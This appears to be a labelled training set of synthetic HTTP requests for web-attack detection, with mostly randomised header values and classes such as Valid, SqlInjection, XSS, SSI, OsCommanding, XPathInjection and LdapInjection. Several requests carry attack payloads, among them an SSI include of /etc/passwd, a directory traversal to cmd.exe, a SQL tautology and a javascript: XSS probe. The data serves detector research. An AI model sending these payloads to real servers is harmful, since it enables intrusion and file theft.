Cookie: seepe4Ejene=snGdswds\window.openrsterfn:;H8tCeAPer=cepassthruq oxtermml)cd: r$forms;uTiOpuaarta=u;sg35sO=0tdxt;1mail0vSlibservicesuEMYchild=ksfbn
Cookie2: $Version="810"
Date: Tue, 06 Dec 05 11:12:10 CET
ETag: "LCyAUTv1NDlcy2-tThpH"
Expect: todx=mj6wd7;rmdo
From: ixits@nymeatnrae.gov
If-Modified-Since: Fri, 02 Apr 04 16:35:36 UTC
If-Unmodified-Since: Thu, 25 Jun 09 22:34:23 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 08
MIME-Version: 7.6
Pragma: ttd=meyga
Proxy-Authorization: Digest opaque="sqsll"
Authorization: nedle 4l5o=4osg
Range: 1-877
Referer: http://stthty.ch/cfos4i3/e5ea4sG/sofszt/TsNpsme.dll
TE: chunked;q=0.1,trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/7.2 (X11; U; Unix 6.9; 4r-dg; rv:2.1.8) Gecko/30752111
UA-CPU: PowerPC
UA-Disp: 2063,773,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 194x0684
Via: FTP/1.7 www.aepqY.css:07
Transfer-Encoding: proa2
Upgrade: trcoos/7.4, ocdNs/3.5
Warning: 451 198.72.245.237:3639 "gyrmlem" 
X-Forwarded-For: 84.186.228.20
X-Serial-Number: 54708069609443708
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41096
Start - Id: 15023
class: Valid
GET /spslel1d/nAU-Zt/ea0diegssaos2TegfhTc/enCX1Xs_Ez@0f/EuiwtgemtRht/tXRoWoI/fefnepc/GcJJKNd/dE4Y6-VFx/CE5c/t-e7/jiQ.jpeg?dtaa=930&c.Kx=9SVilo-czuwG&Ytiortn0i2nyg=3396163&mr=16131&2ggF@UbinAD=un%5Dlinkc3xawdrop%25bi9mgadminkt6&04Ognrzni=nCvfJW&aiHnDiemtlr=o1qegIa9I&lesi5jTotswhs=dtgCcHdl&uien=o&dteyithstpaaaio=y3-eXj&4rszocsxuepaN=68&uunhniwqicaHao=eaDU_eFRY HTTP/1.0
Host: 55.45.65.237
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: li1Rh-pa;q=0.4, e-na;q=0.6, n-jetsrsTr
Cache-Control: no-cache
Client-ip: 35.69.77.51
Cookie: Efdyddz=31;.PfX=d?;rensstlmcfja=2500
Cookie2: $Version="838"
Date: Sat, 04 Apr 09 22:30:47 UTC
ETag: W/".hzPqiXYixjS-SyfCWlj"
Expect: 100-continue
From: emft@nUDA.it
If-Modified-Since: Fri, 29 Jan 10 11:52:54 GMT
If-Unmodified-Since: Wed, 27 Dec 06 16:33:21 UTC
If-Match: "D7_t1TrwlkOJN.9ESU@1"
If-None-Match: *
If-Range: *
Max-Forwards: 96
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: sneehi ac4otb7y=fkida
Authorization: Digest algorithm=3epohbt
Range: -458527,888376-56056
Referer: http://claLia.cz/rajeReG/cs6re/ttln.swf
TE: chunked;q=0.3
Trailer: Upgrade
User-Agent: Mozilla/4.6 (Windows; U; Win98 0.7; w5-9r; rv:9.0.8) Gecko/44592772
UA-CPU: MIPS
UA-Disp: 7976,801,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 7618x6392
Via: HTTP/7.9 90.48.228.227, 9.2 www.cagott.jpg
Transfer-Encoding: gzip
Upgrade: ieR9s/3.6, iso/3.6
Warning: 742 www.inttce.js "oAn7ShenPaoetctTnl" "Sat, 02 Dec 06 12:45:12 CET"
X-Forwarded-For: 185.54.94.71
X-Serial-Number: 958943826904140
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15023
Start - Id: 27970
class: Valid
GET /oG2Le9bed/neA_QXfLt3jHy/txnKW6UNAxnt7mm/rsea/tK/eswzeeiot5hbt/9logxterm68v/tZb/bnd.jpeg?He=u68A&1dwaef=91y&tdlo3WtryT2i=92324 HTTP/1.0
Host: 33.52.185.94:80
Connection: 74ereaw
Accept: */*;q=0.2
Accept-Charset: iso-8859-2, x-mac-japanese;q=0.5
Accept-Encoding: compress, deflate, identity
Accept-Language: ora-e8uhimt
Cache-Control: no-cache
Client-ip: 37.171.143.216
Cookie: daaarsnhE=psu7kusarsiiutdlNe;oegk=/l0sock_streamczwinntVhnn21
Cookie2: $Version="9"
Date: Tue, 14 Jun 05 10:36:26 CET
ETag: W/"ajuP5YC5yyxw6DQ7R"
Expect: jcedea7
From: aclt@ntyaoohns.cz
If-Modified-Since: Thu, 23 Nov 06 20:18:17 GMT
If-Unmodified-Since: Thu, 21 Aug 08 08:04:10 GMT
If-Match: *
If-None-Match: *
If-Range: "VW8mPYdHSLa-yH3"
Max-Forwards: 97
MIME-Version: 6.5
Pragma: bDnw='mtnyIh'
Proxy-Authorization: Digest username="eAeuolls"
Authorization: Digest response="6fa31CAFAF1e048B7d63D993bB84d4A4"
Range: 31980-045
Referer: http://oaHE5.uk/tloO/Swo0/titr/axeoet/eute.css
TE: trailers,deflate,gzip;q=0.4
Trailer: Accept-Encoding
User-Agent: Mozilla/7.0 (X11; U; Open BSD i386 2.0; eo-lo; rv:7.8.8) Gecko/70558490
UA-CPU: Sparc
UA-Disp: 7626,126,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 5151x4689
Via: HTTP/6.8 217.125.41.8, 1.4 www.ehaTrf.js, HTTP/6.1 www.Trud.png
Transfer-Encoding: identity
Upgrade: 5Dytss/2.7
Warning: 670 www.Exsed.png "1tr73sd" 
X-Forwarded-For: 215.26.89.210
X-Serial-Number: 74914
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27970
Start - Id: 39636
class: SSI
GET /isuEvrta8etdn/eoig4/mo7e13Vh..shtml?ssni1o=ltmesettdjksop&lRtnietot4r=%3C%21--++%23include++++virtual%3D%22%2Fetc%2Fpasswd%22+++++--%3E&wbOIAsveeri=%2Fira&eoyo6Fa3yaaio=81002&aah=66645270&rcp0apositioneval=elog&dt=ri3a&ttw=1wnenvie&5luyu=ekzrs&r6aei=sndltcs&ji=177934001&otop=nr3&iEhhn=tslFanvl&TgeJMYaZXWF=fLaf4qstrec8hm&6bTmakpupdatePA=setceNic HTTP/1.1
Host: 152.198.92.99
Connection: keep-alive
Accept: application/x-tar;q=0.3, audio/x-wav, video/*
Accept-Charset: windows-1250;q=0.6, utf-7;q=0.2
Accept-Encoding: gzip;q=0.0, gzip;q=0.9, identity
Accept-Language: ion-v;q=0.7, haApnvae-s5ot2es
Cache-Control: no-transform
Client-ip: 247.22.50.108
Cookie: fsba7bbprao1Eeg=ldelete;emegmSe0otbtoch=@9;0nt=7;5metapBuniontx-=execn
Cookie2: $Version="9"
Date: Sun, 02 Sep 07 09:52:49 CET
ETag: W/".@GkSJvtPzLZspt_F@eR"
Expect: irarnre
From: metmxas@4atEjc.ch
If-Modified-Since: Mon, 08 Jan 07 24:32:16 GMT
If-Unmodified-Since: Wed, 13 Jul 05 23:05:22 GMT
If-Match: "5649_BVinmGcR92K"
If-None-Match: *
If-Range: Tue, 15 May 07 15:09:22 GMT
Max-Forwards: 14
MIME-Version: 1.8
Pragma: Faefs='tla0u'
Proxy-Authorization: Basic MklyaW46dHI1dDV6b3A=
Authorization: Digest response="aAfF8FfAb82115595Dea3D96e2D87B7a"
Range: -8469,086240-,65-225201
Referer: /hehjo/casC.mp3
TE: gzip
Trailer: Authorization
User-Agent: Mozilla/5.0 (Windows; U; Win 9x 4.3; xa-yh; rv:1.3.9) Gecko/08486938
UA-CPU: PowerPC
UA-Disp: 470,8277,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 2034x6396
Via: 3.3 www.4nva.shtml, aocias/0.5 208.21.81.107
Transfer-Encoding: gzip
Upgrade: o7s/5.6, dipl/2.7
Warning: 233 www.tttteg.htm "ttmdenotsrmsagg2nt4" "Mon, 21 May 07 21:20:21 CET"
X-Forwarded-For: 209.99.255.194
X-Serial-Number: 659531112
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39636
Start - Id: 44349
class: OsCommanding
GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 235.42.28.55:80
Connection: close
Accept: text/*, application/*, text/plain;q=0.7
Accept-Charset: *
Accept-Encoding: compress
Accept-Language: NeX-ooypi, mobilnno-g;q=0.3, whzi3a-NeiijiRe;q=0.8, nhhros-Renfabn, th9arN0-2tz
Cache-Control: min-fresh=1
Client-ip: 253.153.154.72
Cookie: oBmiNt=0a+nsdzdiiwink
Cookie2: $Version="2"
Date: Sat, 07 Aug 04 19:05:41 UTC
ETag: "RSp4zdzXB1AJ_l1"
Expect: ethDSte
From: oehrc@o8se.com
If-Modified-Since: Tue, 27 Apr 10 13:24:31 GMT
If-Unmodified-Since: Fri, 01 Dec 06 03:19:01 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 13 Mar 10 05:58:32 UTC
Max-Forwards: 780
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: iHauOk iIeethi7=3ndhh
Authorization: Digest username="rneutiaD"
Range: -61939,-108
Referer: /nihrs/yo9Sb/6sgh/okn8/niuiln.asp
TE: gzip,gzip
Trailer: Max-Forwards
User-Agent: Mozilla/5.9 (compatible; Konqueror/6.6; Linux i586; ee6fdoiLe)
UA-CPU: x86
UA-Disp: 5843,217,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 673x399
Via: 3.3 www.nea5ttS.css, sywoe/1.4 19.129.86.156:6, 8.9 73.48.109.8
Transfer-Encoding: deflate
Upgrade: 4et/8.8, is0/1.7, mseCwu/8.0
Warning: 732 www.nidnAqoh.js "estaore5gordngon0ar" "Fri, 26 Nov 04 13:07:04 GMT"
X-Forwarded-For: 179.136.110.96
X-Serial-Number: 7714827508800
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44349
Start - Id: 42330
class: SqlInjection
GET /iw2ehnlstAnaoOahp/wtPJ6hA2tyd/nus.nsf?wherercpPYNKo=%27+++++%2F**%2F+++OR+%2F**%2F+%27cphxelwO%27+++++%3E++++%27S&htims=9798420&oapshcr=tKe&AnlireZfaEa=504779&uexnIroii=m+E%2F&Ptea8=540462 HTTP/1.0
Host: www.eihoor.it:85296
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 64.206.153.107
Cookie: qr8UjtttTsaj=jm1;9idgohevc=?r7alk;rsshoo=|msnsamsDt;M3VZyBGF=rr;y6oieroele=10;hennoedbrm=irtopenhoneo s0
Cookie2: $Version="52"
Date: Wed, 07 Apr 04 18:32:40 UTC
ETag: "_05h89GLjeFPIMmU"
Expect: 100-continue
From: dtce1iim@oe8uountoe.de
If-Modified-Since: Sat, 19 Dec 09 02:46:38 CET
If-Unmodified-Since: Mon, 28 Dec 09 14:39:41 CET
If-Match: "b570d2JRlzPth825x"
If-None-Match: *
If-Range: "zrgQlsTeKt24OguDv"
Max-Forwards: 2769
MIME-Version: 1.1
Pragma: syeoh='eooft'
Proxy-Authorization: aslasl sfwmhi=G8in4aid
Authorization: Basic ZWRhdzpsb2dFaA==
Range: -416,3-,-523324
Referer: http://www.iseba.it/atis0oc/Eaffr.ace
TE: trailers,deflate,trailers
Trailer: User-Agent
User-Agent: Ttlcs5t (e.so-r; cnL0dggL; t@lfKLcC; eHvYD-Azeu)
UA-CPU: MIPS
UA-Disp: 695,8049,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 4371x6437
Via: FTP/1.0 www.t4ofnrp.jpg, FTP/4.3 www.udtw5ort.png, 3.7 www.BboF9dls.css
Transfer-Encoding: ipvwE
Upgrade: a7a59/7.5, fns/4.8, 3c9id/4.9
Warning: 797 57.31.42.175 "ddh8os78iba" "Mon, 22 Aug 05 11:07:24 UTC"
X-Forwarded-For: 218.249.114.241
X-Serial-Number: 807714416153290560
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42330
Start - Id: 20736
class: Valid
GET /mhtwsiqclrnatald/dAGsZcL5Pndtp8@riBV/70iL@aj.cfm?cr=4&hto=btOtd5t&mtetee=iot&ntconnectQbnZDS1pI=c&6Qoda0rc6t9rtit=%7Cee%5Cftelnet%5D%7E%2FhrIeservices%5DIlai&a4dreh=3whlorse&agii=27&9otighPe7wrhn1a=kvn&seMeseeaomh=i0delhahE&ob=uAz&se=lm&n5Tinord=r%7C&wig=xanXO1Zb_iM5 HTTP/1.1
Host: 4.68.171.240
Connection: wMwu
Accept: video/*, image/jpeg;q=0.0, text/*;q=0.3
Accept-Charset: *;q=0.5
Accept-Encoding: gzip;q=0.1, compress, gzip
Accept-Language: *;q=0.9
Cache-Control: max-stale=1531
Client-ip: 152.95.254.90
Cookie: 8swacisi2s1o=hk4sPcXfF;rszlithh=38;Raeid=uatIn2whrniqpat;isibehntwiW=dtaa
Cookie2: $Version="9"
Date: Sat, 09 Sep 06 02:17:37 GMT
ETag: "1DgOo2vdxETCOqChv"
Expect: Eihnefr
From: edarepsn@mOihgon.org
If-Modified-Since: Tue, 18 Mar 08 13:18:39 UTC
If-Unmodified-Since: Wed, 05 May 10 24:02:28 UTC
If-Match: "RpFvRhLV9J@ix1O7"
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 0.4
Pragma: p=eOu9o3u
Proxy-Authorization: 3ihsg eeptsi=olSth
Authorization: oM0rio lA2het=ihmi1irx
Range: -497842,992988-5164
Referer: /PnCo1ssi/eets/sg4y5ers/sTal.cfm
TE: trailers,trailers,trailers
Trailer: If-Range
User-Agent: nuh5nur (uDbR@j5J)
UA-CPU: MIPS
UA-Disp: 4789,4101,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 413x553
Via: 0.7 144.31.190.113, 3.1 232.168.112.139
Transfer-Encoding: identity
Upgrade: log/9.9, neIir/5.4
Warning: 537 www.aR5leIta.jpeg "ihr8JStafcceegi" "Sun, 12 Sep 04 17:41:00 CET"
X-Forwarded-For: 148.116.239.129
X-Serial-Number: 43053635016402500046
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20736
Start - Id: 35869
class: XPathInjection
GET /ra5otatgjm/oBSb_E8d_D2n/as/0nGNhmyo4ditkioi/FvhFMYlY-IvA0Dwp-/QtBGxexecopenQAZPmS/lnrepx/Rar0acceptC%uYhmoDBRU.php?stezs3=fLgueteoxEiogo+&rotas=sr&eae=387313998&lwiooc08ebse0=nawpAonetcateprocessing-instruction+%2Btoopt6&oekfrtn1e3so=E%3Brt4tO&TmJ46vbscriptR3QNk=ico0g&@I4vmPM=euab&tsnaa9=63240&gpUhkZKZ=64+++++or++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D++++%7C+++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++or++454%3D&eedtt7roos=h22LQ&Hn=da4Tt&dnos7xi=95&dPdEAunJ8I=noa%3Es HTTP/1.0
Host: 143.33.195.62
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: big5;q=0.0, utf-8, windows-874;q=0.2, x-mac-roman, windows-1253;q=0.8
Accept-Encoding: identity, compress;q=0.5
Accept-Language: ssioi-cmHan, Z-ern, mi-qosme4ef;q=0.7, ni7pu-0, ae9cin-aoutr
Cache-Control: min-fresh=3
Client-ip: 118.230.75.151
Cookie: hrrfizdso=thshutdownze rSsm;aie5=6etnie;f6cnNeatlSt=4337;iroErrn9Lem=httpt;xsfEn4leh=i509_FaN44H
Date: Thu, 30 Jun 05 02:14:53 CET
ETag: "j6_RBDMJQV7b5lSDIfdF"
Expect: 100-continue
From: Fpheel@eire9igs.org
If-Modified-Since: Sat, 08 Nov 08 10:41:54 UTC
If-Match: "Hx5IVyUk5_fz_6zEmvo"
If-None-Match: "dcDFEw2DYOQTV@2qI7js"
Max-Forwards: 8
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM ZnRlb2RyaHRlS2RhOWVzMGlhT29hYWFEd2EwSTk5ZXJpSFN0OGU3YnJzdGw=
Referer: http://www.tb0lesiI.cz/um9t1b/csVa.mspx
Trailer: Expect
User-Agent: itvntrg
Via: 3.2 20.147.36.45, osrg/8.2 www.ts3eei58.html
Warning: 341 www.ei3igla.htm:804 "dheeeoo9Tztn" 
X-Serial-Number: 160475

null

End - Id: 35869
Start - Id: 5081
class: Valid
POST /hhha/etlo2fg8ttsd/ieheCryds/3S4JG.O/xgroup by29jmS/en0hiolldtehdnhiA3i/eayNaon/j0agVdnq1UWvWyoanu6f/0tebhtcnSafMhs/s3nStnnevst6/pDZOwmy0l4.wkv.php4? HTTP/1.1
Content-Length: 131
Content-Language: 1syann,eda,Pett
Content-Encoding: compress
Content-Location: /dan1imrt/csuje/nprxe/aorans/eieeg.js
Content-MD5: YXJuYTdiaGNjbDNrZWREbg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 17 Jun 04 22:56:26 CET
Last-Modified: Tue, 20 Jul 04 11:53:12 GMT
Host: 51.155.64.16
Connection: aeFhwcr
Accept: text/*;q=0.5
Accept-Charset: iso-8859-1;q=0.0, windows-1255;q=0.6, iso-8859-15
Accept-Encoding: gzip;q=0.0, gzip;q=0.5, compress, deflate, gzip
Accept-Language: *;q=0.4
Cache-Control: min-fresh=1
Client-ip: 162.116.175.230
Cookie: r9ic=khA3dtrir;rcts5RlOorosr=hMbgyCX;eiunaicfs6D44t=e@Dmi3EbD;lCsisKwsrdghn1j=r5;nt2uot=r su;leoemutsebt=ngsvarpasswd
Cookie2: $Version="9"
Date: Wed, 04 Feb 09 10:36:41 GMT
ETag: W/"w1nRMngetPnoVO-EXg"
Expect: 9patrest
From: npvh@lhUhfi.st
If-Modified-Since: Thu, 12 Aug 04 10:29:13 CET
If-Unmodified-Since: Tue, 30 Nov 04 17:05:55 UTC
If-Match: *
If-None-Match: "j4Nl6P3PPhd@q93"
If-Range: *
Max-Forwards: 07
MIME-Version: 3.6
Pragma: ltnteof='yu9s'
Proxy-Authorization: Basic dGlzRzhldzpsN3dpaW53eQ==
Authorization: Digest algorithm=MD5-sess
Range: 4666-,507125-81685,186998-
Referer: /sMv2sIk/GnTnoye.msf
TE: trailers,deflate,trailers
Trailer: Host
User-Agent: Mozilla/1.0 (compatible; Konqueror/5.1; Linux i386; AmeAart; gegamn; liir7fo1)
UA-CPU: PowerPC
UA-Disp: 925,165,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 9463x8192
Via: 9.5 90.248.13.105, FTP/9.3 www.daBs.png
Transfer-Encoding: gzip
Upgrade: e6prei/5.1, o9ixn/0.8, oeRr/9.8, EimarD/3.9
Warning: 924 www.0aalst.html "scbouiehneadt8mn" "Wed, 22 Jun 05 19:29:52 CET"
X-Forwarded-For: 90.219.143.51
X-Serial-Number: 100173301629912
----: -----------------------
~~~~~: ~~~~~~~~~~

l9aiin1=9757008&vnatlehw=z9NBE8&maun3ei=7645&tihcul=rYXL5vCn@&ueaPan=zjn5HJwV&execNshutdownBkP6u=secmmowbv1&yC-positionMzIm=39091

End - Id: 5081
Start - Id: 48133
class: XSS
GET /7-Pz5YbRMkwP78/cmdC/1m/2V/ret5smbdny8cot/suloinnp/lwn/bSk/2srdeeefadrxL/r3O8UEi/peAoeutphytEb/le2rjeafjDyo33arux.js?l5Eoimad3eewle=sKF1&Robpn=%3Cxml++src++++%3D+++%22++++javascript%3A+++%5Balert++%28%27etrneeD%27%29%3B%5D++%22%3E&3JWQuKdm=rD4OD.w&siHelioa=3068738&osypaRnky3l=080415895&t5zs=28408&CniUcscriptaBr=cch0a HTTP/1.0
Host: www.attDnbsaa.uk
Connection: close
Accept: audio/*;q=0.7
Accept-Charset: koi8, iso-8859-7;q=0.2, iso-8859-4;q=0.3, cp-936, iso-8859-3;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: max-stale=83191
Client-ip: 250.253.78.18
Cookie: phmeshbesrgaa=0awde/;eep=dtadbe5vel;atesd=ct
Cookie2: $Version="346"
Date: Tue, 06 Apr 10 03:52:27 UTC
ETag: W/"RdKDdWmzVeSfgJG3"
Expect: 100-continue
From: terhoe3@ygfzae.st
If-Modified-Since: Sun, 08 Aug 04 07:26:33 UTC
If-Unmodified-Since: Tue, 25 Apr 06 23:49:44 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 03 Dec 07 20:32:24 UTC
Max-Forwards: 4380
MIME-Version: 8.0
Pragma: ew=CstO
Proxy-Authorization: Digest realm
Authorization: fNss o6se=C22aan
Range: 839-854295,-2024
Referer: /oterr/witen2Bq.php4
TE: deflate,gzip,trailers
Trailer: Accept
User-Agent: ouc4oFef (mvi.fV; xFzSNpMh; yaKOWNfkX; mi3gWXM)
UA-CPU: Sparc
UA-Disp: 121,8495,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 8071x836
Via: FTP/3.2 www.ohdudahd.jpg
Transfer-Encoding: deflate
Upgrade: ahrnb/9.3, dedEnm/2.8, Knaee1/4.9, betzh/8.1, EaMe1a/1.8
Warning: 498 www.wgtooe.gif "ho8ldhnztnh" 
X-Forwarded-For: 72.155.7.72
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48133
Start - Id: 30186
class: Valid
GET /.insertK6UEImG.tiff? HTTP/1.0
Host: 117.196.118.123
Connection: keep-alive
Accept: application/zip, video/*, audio/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 142.65.134.222
Cookie: MEtDx6Ao=wxQUSamNo7a;VLtS_14b2V=sdc3slo2bArtwe7gg;EN0JDOtW=imnullr
Cookie2: $Version="3"
Date: Fri, 29 Aug 08 24:37:56 CET
ETag: W/"MCrQ0qPgTN4bDuHMj"
Expect: 100-continue
From: wieAim@aawfi.fr
If-Modified-Since: Sun, 22 Feb 09 21:40:58 UTC
If-Unmodified-Since: Wed, 02 Sep 09 15:50:56 CET
If-Match: "dsFG4RU2RAS0WX9l"
If-None-Match: "J5Qw4QwBn8vYxO5uS7m"
If-Range: Sat, 28 Jun 08 15:12:40 UTC
Max-Forwards: 99
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: aGeo uhioari5=RFiho
Authorization: eoLie oA8DtE=cia3d
Range: 922332-59
Referer: http://emftoe.net/dte0rt/lhEtn/ebeI/nSGneta.tiff
TE: trailers,chunked;q=0.8
Trailer: Connection
User-Agent: Mozilla/9.7 (Machintosh; U; PPC 8.1; xl-Is; rv:7.0.1) Gecko/12080363
UA-CPU: x86
UA-Disp: 133,828,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 488x0113
Via: 5.2 www.rzyIH.shtml, 1soteu/2.5 www.ycstn.jpeg, FTP/6.6 87.158.97.203
Transfer-Encoding: compress
Upgrade: hosi/6.7, fne0e/8.7, zeue/7.8
Warning: 984 51.149.72.243:8960 "8toseEec" 
X-Forwarded-For: 46.52.217.2
X-Serial-Number: 96974116
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 30186
Start - Id: 37048
class: LdapInjection
GET /ltn48detre9ghIitozv/yayAErnwrxu/jsBkPeCZ-oX-.gif?ao8Sir8=%2FehtpassuIichildt&ics4H=%2Bmd&rdawof6=tc_1w6&oh7h=lr&at2se=6307&ptseyoeonurnr=39lsgsujto&8ro=3at&oeTEeshlasgttra=0pcdtenhoia&kDf1.iyhF0=%7E%25ipsg&5w82slbdgceqi=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29 HTTP/1.0
Host: www.enty8a.uk:7924
Connection: close
Accept: */*
Accept-Charset: x-mac-ce;q=0.6, iso-8859-3;q=0.5, windows-874;q=0.8, euc-tw;q=0.0
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: no-store
Client-ip: 128.25.71.85
Cookie: stdLdeoovA=27ySwu;aaldnl=<3eoH<aa8N&
Cookie2: $Version="4"
Date: Thu, 25 Mar 04 08:48:55 CET
ETag: "pCx4hdVFNF.DM1COX"
Expect: yciscR=nahtzOj;mEmtfo
From: ibiyuSf@istTee.cz
If-Modified-Since: Sat, 26 Sep 09 16:59:25 CET
If-Unmodified-Since: Sun, 19 Oct 08 02:05:18 UTC
If-Match: *
If-None-Match: *
If-Range: "nFLIjUeH7XGYUQ1pvTi"
Max-Forwards: 23
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Digest opaque="isetlaxp"
Authorization: Basic ZHR0THRsOnIxeTNlcg==
Range: 0495-,7886-,01366-498382
Referer: /deTovanm/yigettrr/bCaiiSua.mdb
TE: chunked,gzip
Trailer: If-Modified-Since
User-Agent: Mozilla/6.3 (compatible; MSIE 1.7; Win98; n0sfoao; Iwoese)
UA-CPU: 68000
UA-Disp: 370,042,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 902x8405
Via: 9.8 34.146.181.145
Transfer-Encoding: identity
Upgrade: nopuat/4.5
Warning: 722 60.238.142.91:0 "bhsRneTrnvR4cnsrez" 
X-Forwarded-For: 143.102.250.73
X-Serial-Number: 595061014884085769
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37048
Start - Id: 32442
class: Valid
GET /sXEqLkRpb52/3hublqes2Aa5Yvagoli/8ooasNqngTigvtsd/otia/AmotyothHoEjrn.jpg?8onlyodnhn=%3Cmwutree7ui&lt=8zsfn3eiy&e5nlornajpic=nW-Bv-Dn&plete5l=group+by&egiiaihnlm8ie=r+&Uf.xocatY_=0oiCataic29iTtreN&sh1tMehe8tei=r+usrt&M_6gOnjsj=5TieuaczqhL&nph-hyiimg0d1i6lsHU=07&dydan=3%3Fdi%25hn%5De%3C+USoaRsm&hhih=qfqE6l6%24raf&onCiin=%2B%7CEn9&eanEoetlakenlo=lvmewhereeehe&qettNnra=li3qM HTTP/1.0
Host: www.neDosxs.st:80
Connection: close
Accept: */*
Accept-Charset: x-mac-arabic, koi8-r;q=0.4, iso-8859-7, x-mac-chinesetrad, windows-1250
Accept-Encoding: *
Accept-Language: ee1bxSb-Iuebht;q=0.4, hRbsq-s
Cache-Control: max-age=6
Client-ip: 251.30.39.27
Cookie: mDN1UI=dBE@q1.;anod9=4726;bTjJEe=pscripto;boE=etdneUaor
Cookie2: $Version="005"
Date: Wed, 27 Apr 05 23:41:28 UTC
ETag: "O3UveuMXKFuic@BzdXB"
Expect: 100-continue
From: oi1hn4@aintRh.uk
If-Modified-Since: Sat, 18 Jun 05 17:33:37 UTC
If-Unmodified-Since: Thu, 06 May 04 12:19:35 GMT
If-Match: "T1knbAeKQAZsPBa2I1"
If-None-Match: *
If-Range: "jxaao9nNoK-cUF_J9Xe"
Max-Forwards: 978
MIME-Version: 9.5
Pragma: Dd='t'
Proxy-Authorization: veenge asjysr=dptwh5t4
Authorization: Basic dHRtbWg6VEFuRQ==
Range: -5,-8701,-8
Referer: /tenih4/emjedMn/rsynaruf/ogwstEI.mdb
TE: chunked;q=0.3
Trailer: Upgrade
User-Agent: nudatshne
UA-CPU: PowerPC
UA-Disp: 339,988,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 5662x6161
Via: 3.5 www.iscYyvh1.html
Transfer-Encoding: identity
Upgrade: 1o0/3.7, s7dacb/4.7
Warning: 120 www.torwc6.shtml "mpfdt" 
X-Forwarded-For: 15.195.139.253
X-Serial-Number: 824098
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 32442
Start - Id: 35124
class: SqlInjection
PUT /ewioscirsleiolmoh.gif? HTTP/1.1
Content-Length: 263
Content-Language: dttepets,q
Content-Encoding: identity
Content-Location: http://www.xkiFi.ch/tceu.avi
Content-MD5: ZWFlaXJvZGVpYWRhb25oZg==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Fri, 15 Apr 05 01:24:23 CET
Host: 75.181.208.171:80
Connection: keep-alive
Accept: audio/basic, image/jpeg;q=0.3
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: n-woe;q=0.9, n-dey;q=0.8
Cache-Control: max-stale
Client-ip: 86.214.16.25
Cookie: t4abhonutr=75060516;GVFnwNx=eocAotr4xelfl;csetea7mes=ms7ertns;d7ldiEmrsrSaTc=et3;dn4UlQPa=20140355;el=2132015991
Cookie2: $Version="43"
Date: Fri, 30 May 08 22:10:13 GMT
Expect: oenfl
If-Modified-Since: Fri, 04 Apr 08 06:59:38 UTC
If-Unmodified-Since: Mon, 28 Jan 08 20:40:25 CET
If-Match: "ASa@X@Jk4GP0J6aifpj"
If-None-Match: *
If-Range: Wed, 09 Jun 04 04:31:57 GMT
Max-Forwards: 47
Pragma: no-cache
Authorization: NTLM bEx0Z2Fod3Rqcmdybm9ubGxhcG9pYUk5YWV0cFpkYWhw
Range: 255878-
Referer: http://rosN1yh.it/ttrn4ix/un5t.shtml
TE: trailers,trailers,deflate
User-Agent: Mozilla/7.5 (X11; U; Solaris 5.3; em-M8; rv:5.3.8) Gecko/39356804
UA-Disp: 124,974,8
UA-OS: Win98
Via: HTTP/1.0 www.golaGf.png
Transfer-Encoding: rdtn
Upgrade: hoOeli/1.6, Aqe/6.6
X-Forwarded-For: 126.226.47.150
